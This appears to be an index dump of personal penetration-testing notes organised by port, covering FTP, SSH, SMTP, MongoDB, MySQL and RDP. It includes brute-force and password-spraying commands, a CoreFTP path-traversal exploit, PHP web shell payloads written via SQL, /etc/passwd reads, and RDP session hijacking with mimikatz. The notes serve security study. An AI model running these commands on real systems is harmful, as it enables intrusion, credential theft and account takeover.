    The prompt will ask us for the username we want to log in with. Here is where the magic happens. A typical misconfiguration for running FTP services allows an anonymous account to access the service like any other authenticated user. The anonymous username can be input when the prompt appears, followed by any password whatsoever since the service will disregard the password for this specific account.

    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#basic-usage","title":"Basic usage","text":"
    # Connect with ftp\nftp $ip\n\n# If anonymous login is allowed, enter anonymous as user and press Enter when prompted for password\n\n# Give you a list of available commands\nhelp\n\n# List directories and files\nls\n\n# List recursively. Not always available, only in some configurations\nls -R\n\n# Change to a directory\ncd <folder>\n\n# Download a file to your localhost\nget <nameofFileInOrigin> <nameOfFileInLocalhost>\n\n# Upload a file from your localhost\nput <yourfile>\n\n# Exit connection\nquit\n\n# Connect in passive mode\nftp -p $ip\n# The `-p` flag in the `ftp` command on Linux is used to enable passive mode for the file transfer protocol (FTP) connection. Passive mode is a mode of FTP where the data connection is initiated by the client rather than the server. This can be useful when the client is behind a firewall or NAT (Network Address Translation) that does not allow incoming connections. \n

    More posibilities with wget:

    # Download all available files at once\nwget -m --no-passive ftp://anonymous:anonymous@$ip\n
    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#footprinting-with-nmap","title":"Footprinting with nmap","text":"
    # Locate all ftp scripts related\nfind / -type f -name ftp* 2>/dev/null | grep scripts\n\n# Run a general scanner for version, mode aggresive and perform default scripts\nsudo nmap -sV -p21 -sC -A $ip\n# ftp-anon NSE script checks whether the FTP server allows anonymous access.\n# ftp-syst, for example, executes the `STAT` command, which displays information about the FTP server status.\n

    See more about nmap for scanning, running scripts and footprinting

    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#attacking-ftp","title":"Attacking FTP","text":"","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#brute-forcing-with-medusa","title":"Brute forcing with Medusa","text":"

    Medusa Cheat sheet.

    # Brute force FTP logging\nmedusa -u fiona -P /usr/share/wordlists/rockyou.txt -h $IP -M ftp\n# -u: username\n# -U: list of Usernames\n# -p: password\n# -P: list of passwords\n# -h: host /IP\n# -M: protocol to bruteforce\n

    However Medusa is very slow in comparison to hydra:

    # Example for ftp in a non default port\nhydra -L users.txt -P pass.txt ftp://$ip:2121\n
    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#ftp-bounce-attack","title":"FTP Bounce Attack","text":"

    An FTP bounce attack is a network attack that uses FTP servers to deliver outbound traffic to another device on the network. For instance, consider we are targetting an FTP Server\u00a0FTP_DMZ\u00a0exposed to the internet. Another device within the same network,\u00a0Internal_DMZ, is not exposed to the internet. We can use the connection to the\u00a0FTP_DMZ\u00a0server to scan\u00a0Internal_DMZ\u00a0using the FTP Bounce attack and obtain information about the server's open ports.

    nmap -Pn -v -n -p80 -b anonymous:password@$ipFTPdmz $ipINTERNALdmz\n# -b The\u00a0`Nmap`\u00a0-b flag can be used to perform an FTP bounce attack: \n
    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#coreftp-server-build-725-directory-traversal-authenticated","title":"CoreFTP Server build 725 - Directory Traversal (Authenticated)","text":"

    CVE-2022-22836 | \u00a0exploit

    Summary: This FTP service uses an HTTP POST request to upload files. However, the CoreFTP service allows an HTTP PUT request, which we can use to write content to files.

    The\u00a0exploit\u00a0for this attack is relatively straightforward, based on a single\u00a0cURL\u00a0command.

    curl -k -X PUT -H \"Host: <IP>\" --basic -u <username>:<password> --data-binary \"PoC.\" --path-as-is https://<IP>/../../../../../../whoops\n

    We create a raw HTTP\u00a0PUT\u00a0request (-X PUT) with basic auth (--basic -u <username>:<password>), the path for the file (--path-as-is https://<IP>/../../../../../whoops), and its content (--data-binary \"PoC.\") with this command. Additionally, we specify the host header (-H \"Host: <IP>\") with the IP address of our target system.

    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#other-ftp-services","title":"Other FTP services","text":"","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#tftp","title":"TFTP","text":"

    Trivial File Transfer Protocol (TFTP) is simpler than FTP and performs file transfers between client and server processes.

    • It does not provide user authentication and other valuable features supported by FTP.
    • It uses UDP.
    • It does not require the user's authentication

    Because of the lack of security, TFTP, unlike FTP, may only be used in local and protected networks.

    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#basic-usage_1","title":"Basic usage","text":"
    # Sets the remote host, and optionally the port, for file transfers.\nconnect\n\n# Transfers a file or set of files from the remote host to the local host.\nget\n\n# Transfers a file or set of files from the local host onto the remote host\nput\n\n# Exits tftp\nquit\n\n# Shows the current status of tftp, including the current transfer mode (ascii or binary), connection status, time-out value, and so on\nstatus\n\n# Turns verbose mode, which displays additional information during file transfer, on or off.\nverbose \n\n# Unlike the FTP client, TFTP does not have directory listing functionality.\n
    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#vsftpd","title":"vsFTPd","text":"

    One of the most used FTP servers on Linux-based distributions is vsFTPd.

    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#installation_1","title":"Installation","text":"
    sudo apt install vsftpd \n
    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#configuration-file","title":"Configuration file","text":"

    The default configuration of vsFTPd can be found in /etc/vsftpd.conf.

    Setting Description listen=NO Run from inetd or as a standalone daemon? listen_ipv6=YES Listen on IPv6 ? anonymous_enable=NO Enable Anonymous access? local_enable=YES Allow local users to login? dirmessage_enable=YES Display active directory messages when users go into certain directories? use_localtime=YES Use local time? xferlog_enable=YES Activate logging of uploads/downloads? connect_from_port_20=YES Connect from port 20? secure_chroot_dir=/var/run/vsftpd/empty Name of an empty directory pam_service_name=vsftpd This string is the name of the PAM service vsftpd will use. rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem The last three options specify the location of the RSA certificate to use for SSL encrypted connections. rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.keyssl_enable=NO

    In addition, there is a file called /etc/ftpusers that we also need to pay attention to, as this file is used to deny certain users access to the FTP service.

    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"22-ssh/","title":"22 ssh","text":"

    Secure Shell (SSH) enables two computers to establish an encrypted and direct connection within a possibly insecure network on the standard port TCP 22.

    Implemented natively on all Linux distributions and MacOS, SSH can also be used on Windows, with an appropriate program. The well-known OpenBSD SSH (OpenSSH) server on Linux distributions is an open-source fork of the original and commercial SSH server from SSH Communication Security.

    There are two competing protocols: SSH-1 and SSH-2. SSH-2, also known as SSH version 2, is a more advanced protocol than SSH version 1 in encryption, speed, stability, and security. For example, SSH-1 is vulnerable to MITM attacks, whereas SSH-2 is not.

    The SSH server runs on TCP port 22 by default, to which we can connect using an SSH client. This service uses three different cryptography operations/methods: symmetric encryption, asymmetric encryption, and hashing.

    ","tags":["pentesting","web pentesting","port 22"]},{"location":"22-ssh/#footprinting-ssh","title":"Footprinting ssh","text":"","tags":["pentesting","web pentesting","port 22"]},{"location":"22-ssh/#ssh-audit","title":"ssh-audit","text":"
    # Installation and execution\ngit clone https://github.com/jtesta/ssh-audit.git \n\n# Execute\ncd ssh-audit\n./ssh-audit.py $ip\n
    ","tags":["pentesting","web pentesting","port 22"]},{"location":"22-ssh/#nmap","title":"nmap","text":"

    Brute force script:

    nmap $ip -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=/usr/share/nmap/nselib/data/passwords.lst\n

    OpenSSH 7.6p1 Ubuntu ubuntu0.3 is well known for some vulnerabilities.

    ","tags":["pentesting","web pentesting","port 22"]},{"location":"22-ssh/#connect-with-ssh","title":"Connect with ssh","text":"
    ssh <user>@$ip\n\n# connect with a ssh key\nssh -i id_rsa <user>@$ip\n
    ","tags":["pentesting","web pentesting","port 22"]},{"location":"22-ssh/#installing-a-ssh-service","title":"Installing a ssh service","text":"

    The sshd_config file, responsible for the OpenSSH server, has only a few of the settings configured by default. However, the default configuration includes X11 forwarding, which contained a command injection vulnerability in version 7.2p1 of OpenSSH in 2016.

    Configuration file: /etc/ssh/sshd_config.

    Common misconfigurations:

    Setting Description PasswordAuthentication yes Allows password-based authentication. PermitEmptyPasswords yes Allows the use of empty passwords. PermitRootLogin yes Allows to log in as the root user. Protocol 1 Uses an outdated version of encryption. X11Forwarding yes Allows X11 forwarding for GUI applications. AllowTcpForwarding yes Allows forwarding of TCP ports. PermitTunnel Allows tunneling. DebianBanner yes Displays a specific banner when logging in.

    Some instructions and hardening guides can be used to harden our SSH servers.

    ","tags":["pentesting","web pentesting","port 22"]},{"location":"23-telnet/","title":"23 telnet","text":"

    Sometimes, due to configuration mistakes, some important accounts can be left with blank passwords for the sake of accessibility. This is a significant issue with some network devices or hosts, leaving them open to simple brute-forcing attacks, where the attacker can try logging in sequentially, using a list of usernames with no password input. Some typical important accounts have self-explanatory names, such as:

    • admin
    • administrator
    • root

    A direct way to attempt logging in with these credentials in hopes that one of them exists and has a blank password is to input them manually in the terminal when the hosts request them. If the list were longer, we could use a script to automate this process, feeding it a wordlist for usernames and one for passwords.

    Typically, the wordlists used for this task consist of typical people names, abbreviations, or data from previous database leaks. For now, we can resort to manually trying these three main usernames above.

    ","tags":["telnet","port 23"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/","title":"Ports 25, 565, 587 - Simple Mail Tranfer Protocol (SMTP)","text":"

    The Simple Mail Transfer Protocol (SMTP) is a protocol for sending emails in an IP network. y default, SMTP servers accept connection requests on port 25. However, newer SMTP servers also use other ports such as TCP port 587. This port is used to receive mail from authenticated users/servers, usually using the STARTTLS command. SMTP works unencrypted without further measures and transmits all commands, data, or authentication information in plain text. To prevent unauthorized reading of data, the SMTP is used in conjunction with SSL/TLS encryption. Under certain circumstances, a server uses a port other than the standard TCP port 25 for the encrypted connection, for example, TCP port 465.

    Mail User Agent (MUA): SMTP client who sends the email. MUA converts it into a header and a body and uploads both to the SMTP server.

    Mail Transfer Agent (MTA): The MTA checks the e-mail for size and spam and then stores it. At this point of the process, this MTA works as the sender's server. The MTA then searches the DNS for the IP address of the recipient mail server. On arrival at the destination SMTP server, the receiver's MTA reassembles the data packets to form a complete e-mail.

    Mail Submission Agent (MSA): Proxy that occasionally precedes the MTA to relieve the load. It checks the validity, i.e., the origin of the e-mail. This MSA is also called Relay server.

    Mail delivery agent (MDA): It deals with transfering the email to the recipient's mailbox.

    ","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/#extended-smtp-esmtp","title":"Extended SMTP (ESMTP)","text":"

    Extended SMTP (ESMTP) deals with the main two shortcomings of SMTP protocol:

    • In SMTP, users are not authenticated, therefore the sender is unreliable.
    • SMTP doesn't have confirmations.

    For this, ESMTP uses TLS for encryption and AUTH PLAIN extension for authentication.

    ","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/#basic-commands","title":"Basic commands","text":"
    # We can use telnet protocol to connect to a SMTP server\ntelnet $ip 25\n\n# AUTH is a service extension used to authenticate the client\nAUTH PLAIN  \n\n# The client logs in with its computer name and thus starts the session. It also lists all available commands\nEHLO\n    # Example: \n    # HELO mail1.inlanefreight.htb\n\n# The client names the email sender\nMAIL FROM   \n\n# The client names the email recipient\nRCPT TO\n\n# The client initiates the transmission of the email\nDATA \n\n# The client aborts the initiated transmission but keeps the connection between client and server\nRSET\n\n# The client checks if a mailbox is available for message transfer. This also means that this command could  be used to enumerate existing users on the system. However, this does not always work. Depending on how the SMTP server is configured, the SMTP server may issue `code 252` and confirm the existence of a user that does not exist on the system.\nVRFY\n# Example: VRFY root\n\n# The client also checks if a mailbox is available for messaging with this command \nEXPN\n\n# The client requests a response from the server to prevent disconnection due to time-out\nNOOP\n\n# The client terminates the session\nQUIT\n

    If we are connected to a proxy and we want this proxy to connect to a SMTP server, the command that we would send than would look something like this:

    CONNECT 10.129.14.128:25 HTTP/1.0\n

    Example:

    telnet $ip 25  \n\n# Trying 10.129.14.128... \u00e7\n# Connected to 10.129.14.128. \n# Escape character is '^]'. \n# 220 ESMTP Server   \n\nEHLO inlanefreight.htb  \n# 250-mail1.inlanefreight.htb \n# 250-PIPELINING \n# 250-SIZE 10240000 \n# 250-ETRN \n# 250-ENHANCEDSTATUSCODES \n# 250-8BITMIME \n# 250-DSN \n# 250-SMTPUTF8 \n# 250 CHUNKING   \n\nMAIL FROM: <cry0l1t3@inlanefreight.htb>  \n# 250 2.1.0 Ok   \n\nRCPT TO: <mrb3n@inlanefreight.htb> NOTIFY=success,failure  \n# 250 2.1.5 Ok   \n\nDATA  \n# 354 End data with <CR><LF>.<CR><LF>  \n\n# From: <cry0l1t3@inlanefreight.htb> \n# To: <mrb3n@inlanefreight.htb> \n# Subject: DB \n# Date: Tue, 28 Sept 2021 16:32:51 +0200 \n\n`Hey man, I am trying to access our XY-DB but the creds dont work.  Did you make any changes there?.`  \n# 250 2.0.0 Ok: queued as 6E1CF1681AB   \n\nQUIT  \n# 221 2.0.0 Bye Connection closed by foreign host.`\n
    mynetworks = 0.0.0.0/0\n

    With this setting, this SMTP server can send fake emails and thus initialize communication between multiple parties. Another attack possibility would be to spoof the email and read it.

    ","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/#footprinting-smtp","title":"Footprinting SMTP","text":"
    sudo nmap $ip -sC -sV -p25\n\nsudo nmap $ip -p25 --script smtp-open-relay -v\n

    Scripts for user enumeration:

    # Enumerate users:\nfor user in $(cat users.txt); do echo VRFY $user | nc -nv -w 6 $ip 25  ; done\n# -w: Include a delay in passing the argument. In seconds.\n

    Results from script in user enumeration:

    (UNKNOWN) [10.129.16.141] 25 (smtp) open\n220 InFreight ESMTP v2.11\n252 2.0.0 root\n(UNKNOWN) [10.129.16.141] 25 (smtp) open\n220 InFreight ESMTP v2.11\n550 5.1.1 <lala>: Recipient address rejected: User unknown in local recipient table\n(UNKNOWN) [10.129.16.141] 25 (smtp) open\n220 InFreight ESMTP v2.11\n550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table\n(UNKNOWN) [10.129.16.141] 25 (smtp) open\n220 InFreight ESMTP v2.11\n252 2.0.0 robin                 \n
    ","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/#postfix-an-example-of-a-smtp-server","title":"Postfix, an example of a SMTP server","text":"","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/#configuration-file","title":"Configuration file","text":"

    See how to install postfix server.

    The configuration file for Porsfix service is /etc/postfix/main.cf

    ","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"27017-27018-mongodb/","title":"27017 - 27018 mongoDB","text":"

    https://book.hacktricks.xyz/network-services-pentesting/27017-27018-mongodb.

    More about mongo.

    ","tags":["mongodb","port 27017","port 27018"]},{"location":"27017-27018-mongodb/#description","title":"Description","text":"

    27017 - The default port for mongod and mongos instances. You can change this port with port or --port.27018 - The default port for mongod when running with --shardsvr command-line option or the shardsvr value for the clusterRole setting in a configuration file. MongoDB is an open source database management system (DBMS) that uses a document-oriented database model which supports various forms of data.

    ","tags":["mongodb","port 27017","port 27018"]},{"location":"27017-27018-mongodb/#to-connect-to-a-mongodb","title":"To connect to a MongoDB","text":"

    More about mongo.

    By default mongo does not require password. Admin is a common mongo database default admin user.

    mongo $ip\nmongo <HOST>:<PORT>\nmongo <HOST>:<PORT>/<DB>\nmongo <database> -u <username> -p '<password>'\n
    ","tags":["mongodb","port 27017","port 27018"]},{"location":"27017-27018-mongodb/#some-mongodb-commands","title":"Some MongoDB commands","text":"

    More about mongo.

    # Enter in mongodb application\nmongo\n\n# See help\nhelp\n\n# Display databases\nshow dbs\n\n# Select a database\nuse <db>\n\n# Display collections in a database\nshow collections\n\n# Dump a collection\ndb.<collection>.find()\n\n# Return the number of records of the collection\ndb.<collection>.count() \n\n# Find in current db the username admin\ndb.current.find({\"username\":\"admin\"}) \n\n# We can dump the contents of the documents present in the flag collection by using the db.collection.find() command. Let's replace the collection name flag in the command and also use pretty() in order to receive the output in a beautified format.\n
    ","tags":["mongodb","port 27017","port 27018"]},{"location":"3128-squid/","title":"3128 Squid","text":"

    Squid is a caching and forwarding HTTP web proxy. It has a wide variety of uses, including speeding up a web server by caching repeated requests, caching web, DNS and other computer network lookups for a group of people sharing network resources, and aiding security by filtering traffic.

    Squid is a widely used open-source proxy server and web cache daemon. It primarily operates as a proxy server, which means it acts as an intermediary between client devices (such as computers or smartphones) and web servers, facilitating requests and responses between them.

    Squid is commonly deployed in network environments to improve performance, enhance security, and manage internet access. Squid can cache frequently requested web content locally. When a client requests a web page or object that Squid has cached, it serves the content from its cache instead of fetching it from the original web server.

    Access Control: Squid provides robust access control mechanisms. Administrators can configure rules to control which clients are allowed to access specific websites or web services.

    Content Filtering: Squid can be used for content filtering and blocking access to specific websites or categories of websites (e.g., social media, adult content). This feature is often used by organizations to enforce acceptable use policies.

    ","tags":["pentesting","web pentesting","port 3128","proxy"]},{"location":"3128-squid/#enumeration","title":"Enumeration","text":"
    # Proxify curl\ncurl -x -proxy http://$ip$:3128 http://$ip$ -H \"User-Agent:Firefox\"\n
    ","tags":["pentesting","web pentesting","port 3128","proxy"]},{"location":"3306-mariadb-mysql/","title":"3306 mariaDB - mySQL","text":"","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#description","title":"Description","text":"

    MySQL: MySQL is an open-source relational database management system(RDBMS) based on Structured Query Language (SQL). It is developed and managed by oracle corporation and initially released on 23 may, 1995. It is widely being used in many small and large scale industrial applications and capable of handling a large volume of data. After the acquisition of MySQL by Oracle, some issues happened with the usage of the database and hence MariaDB was developed.

    MariaDB: MariaDB is an open source relational database management system (RDBMS) that is a compatible drop-in replacement for the widely used MySQL database technology. It is developed by MariaDB Foundation and initially released on 29 October 2009. MariaDB has a significantly high number of new features, which makes it better in terms of performance and user-orientation than MySQL.

    sudo nmap $ip -sV -sC -p3306 --script mysql*\n
    sudo nmap -sS -sV --script mysql-empty-password -p 3306 $ip\n
    ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#connect-to-database-mariadb","title":"Connect to database: mariadb","text":"
    # -h host/ip   \n# -u user As default mariadb has a root user with no authentication\nmariadb -h <host/IP> -u root\n
    ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#connect-to-database-mysql","title":"Connect to database: mysql","text":"","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#from-linux","title":"From Linux","text":"
    # -h host/ip   \n# -u user As default mysql has a root user with no authentication\nmysql --host=INSTANCE_IP --user=root --password=thepassword\nmysql -h <host/IP> -u root -p<password>\n\nmysql -u root -h <host/IP>\n
    ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#from-windows","title":"From windows","text":"
    mysql.exe -u username -pPassword123 -h $IP\n
    ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#mariadb-commands","title":"mariadb commands","text":"
    # Get all databases\nshow databases;\n\n# Select a database\nuse <databaseName>;\n\n# Get all tables from the previously selected database\nshow tables; \n\n# Dump columns from a table\ndescribe <table_name>;\n\n# Dump columns from a table\nshow columns from <table>;\n\n# Select column from table\nselect usename,password from users;\n
    ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#upload-a-shell","title":"Upload a shell","text":"

    Take a wordpress installation that uses a mysql database. If you manage to login into the mysql panel (/phpmyadmin) as root then you could upload a php shell to the /wp-content/uploads/ folder.

    Select \"<?php echo shell_exec($_GET['cmd']);?>\" into outfile \"/var/www/https/blogblog/wp-content/uploads/shell.php\";\n
    ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#mysql-basic-commands","title":"mysql basic commands","text":"

    See mysql.

    # Show datases\nSHOW databases;\n\n# Show tables\nSHOW tables;\n\n# Create new database\nCREATE DATABASE nameofdatabase;\n\n# Delete database\nDROP DATABASE nameofdatabase;\n\n# Select a database\nUSE nameofdatabase;\n\n# Show tables\u00e7\nSHOW tables;\n\n# Dump content from nameOftable\nSELECT * FROM NameOfTable\n\n# Create a table with some columns in the previously selected database\nCREATE TABLE person(nombre VARCHAR(255), edad INT, id INT);\n\n# Modify, add, or remove a column attribute of a table\nALTER TABLE persona MODIFY edad VARCHAR(200);\nALTER TABLE persona ADD description VARCHAR(200);\nALTER TABLE persona DROP edad VARCHAR(200);\n\n# Insert a new row with values in a table\nINSERT INTO persona VALUES(\"alvaro\", 54, 1);\n\n# Show all rows from table\nSELECT * FROM persona\n\n# Select a row from a table filtering by the value of a given column\nSELECT * FROM persona WHERE nombre=\"alvaro\";\n\n# JOIN query\nSELECT * FROM oficina JOIN persona ON persona.id=oficina.user_id;\n\n# UNION query. This means, for an attack, that the number of columns has to be the same\nSELECT * FROM oficina UNION SELECT * from persona;\n
    ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#enumeration-queries","title":"Enumeration queries","text":"
    # Show current user\ncurrent_user()\nuser()\n\n# Show current database\ndatabase()\n
    ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#command-execution","title":"Command execution","text":"","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#writing-files","title":"Writing files","text":"

    MySQL\u00a0supports\u00a0User Defined Functions\u00a0which allows us to execute C/C++ code as a function within SQL, there's one User Defined Function for command execution in this\u00a0GitHub repository.

    MySQL\u00a0does not have a stored procedure like\u00a0xp_cmdshell, but we can achieve command execution if we write to a location in the file system that can execute our commands.

    • If MySQL\u00a0operates on a PHP-based web server or other programming languages like ASP.NET, having the appropriate privileges, attempt to write a file using\u00a0SELECT INTO OUTFILE\u00a0in the webserver directory.
    • Browse to the location where the file is and execute the commands.
     SELECT \"<?php echo shell_exec($_GET['c']);?>\" INTO OUTFILE '/var/www/html/webshell.php';\n
    • In\u00a0MySQL, a global system variable\u00a0secure_file_priv\u00a0limits the effect of data import and export operations, such as those performed by the\u00a0LOAD DATA\u00a0and\u00a0SELECT \u2026 INTO OUTFILE\u00a0statements and the\u00a0LOAD_FILE()\u00a0function. These operations are permitted only to users who have the\u00a0FILE\u00a0privilege.
    • Settings in the secure_file_priv:
      • If empty, the variable has no effect, which is not a secure setting as we can read and write data using\u00a0MySQL:

        show variables like \"secure_file_priv\";\n
    +------------------+-------+\n| Variable_name    | Value |\n+------------------+-------+\n| secure_file_priv |       |\n+------------------+-------+\n
    # To write files using MSSQL, we need to enable Ole Automation Procedures, which requires admin privileges, and then execute some stored procedures to create the file:\n\nsp_configure 'show advanced options', 1;\nRECONFIGURE;\nsp_configure 'Ole Automation Procedures', 1;\nRECONFIGURE;\n\n# Using MSSQL to Create a File\nDECLARE @OLE INT;\nDECLARE @FileID INT;\nEXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT;\nEXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\\inetpub\\wwwroot\\webshell.php', 8, 1;\nEXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET[\"c\"]);?>';\nEXECUTE sp_OADestroy @FileID;\nEXECUTE sp_OADestroy @OLE;\n
    • If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist; the server does not create it.
    • If set to NULL, the server disables import and export operations.
    ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#reading-files","title":"Reading files","text":"","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#mysql-read-local-files-in-mysql","title":"MySQL - Read Local Files in MySQL","text":"

    If permissions allows it:

    select LOAD_FILE(\"/etc/passwd\");\n
    ","tags":["mariadb","port 3306","mysql"]},{"location":"3389-rdp/","title":"3389 rdp","text":"","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#description","title":"Description","text":"

    source: https://book.hacktricks.xyz/network-services-pentesting/pentesting-rdp and HackTheBox Academy.

    Basic information about RDP service: Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software (from here).

    Name Description port 3389/TCP state open service ms-wbt-server version Microsoft Terminal Services Banner rdp-ntlm-info

    RDP works at the application layer in the TCP/IP reference model, typically utilizing TCP port 3389 as the transport protocol. However, the connectionless UDP protocol can use port 3389 also for remote administration. The Remote Desktop service is installed by default on Windows servers and does not require additional external applications. This service can be activated using the Server Manager and comes with the default setting to allow connections to the service only to hosts with Network level authentication (NLA).

    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#enumeration","title":"Enumeration","text":"

    To check the available encryption and DoS vulnerability (without causing DoS to the service) and obtains NTLM Windows info (versions).

    nmap uses RDPcookies (mstshash=nmap) to interact with the RDP server. These cookies can be identified by security services such as EDRs, and can lock us out, so we need to think twice before running that scan.

    nmap -Pn -sV -p3389 --script rdp-*  $ip\n

    Results:

    PORT     STATE SERVICE       VERSION\n3389/tcp open  ms-wbt-server Microsoft Terminal Services\n| rdp-enum-encryption:\n|   Security layer\n|     CredSSP (NLA): SUCCESS\n|     CredSSP with Early User Auth: SUCCESS\n|_    RDSTLS: SUCCESS\n| rdp-ntlm-info:\n|   Target_Name: EXPLOSION\n|   NetBIOS_Domain_Name: EXPLOSION\n|   NetBIOS_Computer_Name: EXPLOSION\n|   DNS_Domain_Name: Explosion\n|   DNS_Computer_Name: Explosion\n|   Product_Version: 10.0.17763\n|_  System_Time: 2022-11-11T12:16:26+00:00\nService Info: OS: Windows; CPE: cpe:/o:microsoft:windows\n

    rdp-sec-check.pl is a perl script to enumerate security settings of an RDP Service (AKA Terminal Services).

    git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check\n\n./rdp-sec-check.pl $ip\n
    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#connection-with-rdp","title":"Connection with rdp","text":"

    To run Microsoft\u2019s Remote Desktop Protocol (RDP) client, a command-line interface called Microsoft Terminal Services Client (MSTSC) is used. We can connect to RDP servers on Linux using xfreerdp, rdesktop, or Remmina and interact with the GUI of the server accordingly.

    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#xfreerdp","title":"xfreerdp","text":"

    See xfreerdp.

    We can first try to form an RDP session with the target by not providing any additional information for any switches other than the target IP address. This will make the script use your own username as the login username for the RDP session, thus testing guest login capabilities.

    xfreerdp /v:$ip\n# /v:$ip: Specifies the target IP of the host we would like to connect to.\n

    Try to login with other default accounts, such as user, admin, Administrator, and so on. We will also be specifying to the script that we would like to bypass all requirements for a security certificate so that our own script does not request them:

    xfreerdp /cert:ignore /u:Administrator /v:$ip\n# /cert:ignore : Specifies to the scrips that all security certificate usage should be ignored.\n# /u:Administrator : Specifies the login username to be \"Administrator\".\n# /v:$ip: Specifies the target IP of the host we would like to connect to.\n

    If successful, during the initialization of the RDP session, we will be asked for a password. We can hit Enter to see if the process continue without one. Sometimes there are severe mishaps in configurations like this and we can gain access.

    If you know user and credentials:

    xfreerdp /u:<username> /p:<\"password\"> /v:$ip \n
    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#brute-force","title":"Brute force","text":"

    ncrack -vv --user <User> -P pwds.txt rdp://$ip\n\nhydra -V -f -L <userslist> -P <passwlist> rdp://$ip\n\nhydra -L user.list -P password.list rdp://$ip\n
    Be careful, you could lock accounts

    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#password-spraying","title":"Password Spraying","text":"

    Be careful, you could lock accounts

    # https://github.com/galkan/crowbar\ncrowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'\n\n# hydra\nhydra -L usernames.txt -p 'password123' 192.168.2.143 rdp\n
    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#connect-with-known-credentialshash","title":"Connect with known credentials/hash","text":"
    rdesktop -u <username> $ip\nrdesktop -d <domain> -u <username> -p <password> $ip\nxfreerdp [/d:domain] /u:<username> /p:<password> /v:$ip\nxfreerdp [/d:domain] /u:<username> /pth:<hash> /v:$ip #Pass the hash\n

    Check known credentials against RDP services

    rdp_check.py from impacket let you check if some credentials are valid for a RDP service:

    rdp_check <domain>/<name>:<password>@$ip\n
    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#attacks","title":"Attacks","text":"","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#session-stealing","title":"Session stealing","text":"

    With SYSTEM permissions you can access any opened RDP session by any user without need to know the password of the owner.

    Get openned sessions:

    query user\n

    Access to the selected session

    tscon <ID> /dest:<SESSIONNAME>\n

    Now you will be inside the selected RDP session and you will have impersonate a user using only Windows tools and features.

    Important: When you access an active RDP sessions you will kickoff the user that was using it. You could get passwords from the process dumping it, but this method is much faster and led you interact with the virtual desktops of the user (passwords in notepad without been saved in disk, other RDP sessions opened in other machines...)

    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#mimikatz","title":"Mimikatz","text":"

    You could also use mimikatz to do this:

    ts::sessions #Get sessions\nts::remote /id:2 #Connect to the session\n

    Sticky-keys & Utilman Combining this technique with stickykeys or utilman you will be able to access a administrative CMD and any RDP session anytime

    You can search RDPs that have been backdoored with one of these techniques already with: https://github.com/linuz/Sticky-Keys-Slayer

